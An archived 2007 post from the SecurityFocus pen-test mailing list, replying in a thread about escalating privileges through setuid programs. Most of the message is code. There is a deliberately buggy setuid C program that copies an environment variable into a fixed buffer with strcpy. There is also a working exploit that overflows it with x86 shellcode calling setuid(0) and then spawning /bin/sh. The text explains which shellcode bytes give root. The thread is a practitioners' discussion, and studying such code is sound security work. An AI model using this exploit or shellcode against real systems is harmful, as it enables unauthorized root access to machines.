| To: | "Andrea Purificato - bunker" <bunker@fastwebnet.it>, <pen-test@securityfocus.com> |
|---|---|
| Subject: | Re: question on escalating privileges via suid vulnerabilities |
| From: | Fábio Russo <fabio.contin.russo@gmail.com> |
| Date: | Tue, 27 Feb 2007 08:16:43 -0300 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | pentest-list2@consult.net |
| Delivered-to: | mailing list pen-test@securityfocus.com |
| Delivered-to: | moderator for pen-test@securityfocus.com |
| Dkim-signature: | a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:from:to:references:subject:date:mime-version:content-type:content-transfer-encoding:x-priority:x-msmail-priority:x-mailer:x-mimeole; b=WazA6UWFCRs73K5Dvt8kyViTAZOAwaxI54E9IDQ33n1v3UYOvur93S5GYR/2d4EpgyZwqnBSTk8O+DeGzPHfVXSNsOnbUAWH9CIt/y0oTtp6XdnBsyvHYm5pjdKqp6326Wauz3PS1VD2GJxSEPM/p5S8iGa+Zl/SAe6HFwp281A= |
| Domainkey-signature: | a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:from:to:references:subject:date:mime-version:content-type:content-transfer-encoding:x-priority:x-msmail-priority:x-mailer:x-mimeole; b=nMVNZMg89fqfBbuH7DqyEZb6D6mwTEcvmNu/hCINfFqdOee/wZXi6PLx8VhKQ8nwxRElFDNVyUBDe2xuo/PqiC4iGaT84+9BbX5kCenNI/GYuPmY3hiy5g8f7USqFJcjffwK0RK+N/ZDQ1YzgD/E48jb3BZrt41rp2ngzhoycw8= |
| List-help: | <mailto:pen-test-help@securityfocus.com> |
| List-id: | <pen-test.list-id.securityfocus.com> |
| List-post: | <mailto:pen-test@securityfocus.com> |
| List-subscribe: | <mailto:pen-test-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:pen-test-unsubscribe@securityfocus.com> |
| Mailing-list: | contact pen-test-help@securityfocus.com; run by ezmlm |
| References: | <7c488dd80702241052y225c158fn9b2c8372f10a6f3b@mail.gmail.com> <200702262051.15560.bunker@fastwebnet.it> |
| Resent-date: | Wed, 28 Feb 2007 09:33:47 -0700 (MST) |
| Resent-from: | pen-test-return-1078483652@securityfocus.com |
| Resent-message-id: | <20070228163347.BB9E5238C30@outgoing3.securityfocus.com> |
| Resent-sender: | listbounce@securityfocus.com |
| Sender: | listbounce@securityfocus.com |
Try with "setuid(0);" before execve :-) -- Andrea "bunker" Purificato +++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++ ++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++. http://rawlab.mindcreations.com
Hi.
Some applications need a setuid(0) before the /bin/sh string because
it have the suid bit set.
see the exemple below:
// buged program with setuid bit set and root privileges:
int main(int argc, char **argv) {
char env[96];
// Shows the return address for exploiting
printf("- %p -\n", &env);
strcpy(env,getenv("BOLINHA"));
return(0);
}
//exploit: usage ./exploit <bugged_program> <return addr>
extern char **environ;
char
shellcode[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main(int argc, char **argv)
{
char string_longa[128];
long *ptr = (long *) string_longa;
int i;
for(i=0; i<32; i++) *(ptr + i) = (int) strtoul(argv[2],NULL,16);
for(i=0; i<(int) strlen(shellcode); i++) string_longa[i]=shellcode[i];
setenv("BOLINHA", string_longa, 1);
execle(argv[1], argv[1], NULL, environ);
printf("%s\n", string_longa);
return (0);
}
Taking a close look into exploit source code we can see that
the firsts bytes in the shellcode are the setuid(0),
more preciselly the \x31\xc0\x31\xdb\xb0\x17\xcd\x80.
This is needed to get a root shell.
if you cut those bytes off from shellcode, you will get a shell
that belongs to the user who executed the exploit.
I hope it can be usefull for someone. -: )
bye.
------------------------------------------------------------------------ This List Sponsored by: Cenzic Need to secure your web apps? Cenzic Hailstorm finds vulnerabilities fast. Click the link to buy it, try it or download Hailstorm for FREE. http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW ------------------------------------------------------------------------ |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | nbns spoofer, Robin Wood |
|---|---|
| Next by Date: | RE: BEA Weblogic pentest, Levenglick, Jeff |
| Previous by Thread: | Re: question on escalating privileges via suid vulnerabilities, Andrea Purificato - bunker |
| Next by Thread: | Pen Testing Company and Legal Documentation, Ricardo Mourato |
| Indexes: | [Date] [Thread] [Top] [All Lists] |